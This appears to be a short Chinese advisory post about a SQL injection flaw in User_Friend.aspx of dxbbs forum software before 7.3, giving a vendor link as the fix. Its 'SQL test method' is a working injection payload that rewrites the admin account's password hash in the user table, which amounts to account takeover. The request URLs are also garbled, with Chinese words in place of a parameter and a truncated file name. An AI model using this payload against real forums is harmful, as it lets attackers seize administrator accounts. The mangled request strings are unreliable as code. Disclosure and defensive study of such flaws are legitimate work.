现在的位置: 首页 > 综合 > 正文

dxbbs注入漏洞

2012年05月11日 ⁄ 综合 ⁄ 共 302字 ⁄ 字号 评论关闭
影响版本:
< dxbbs 7.3
详细说明:
在User_Friend.aspx过滤了=Add&Name=admin加上''

典型的过滤不严,导致注入漏洞.

参考:
http://www.winshell.cn/read.php?508
解决方案:
http://www.dxbbs.cn/
测试方法:

[警 告]

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!

SQL版测试方法:
ser_Friend.aspx过滤了=Add&Name=大蝉;Update [Dxbbs_user] set user_pass=''7a57a5a743894a0e'' where user_name=''admin'';-- 

抱歉!评论已关闭.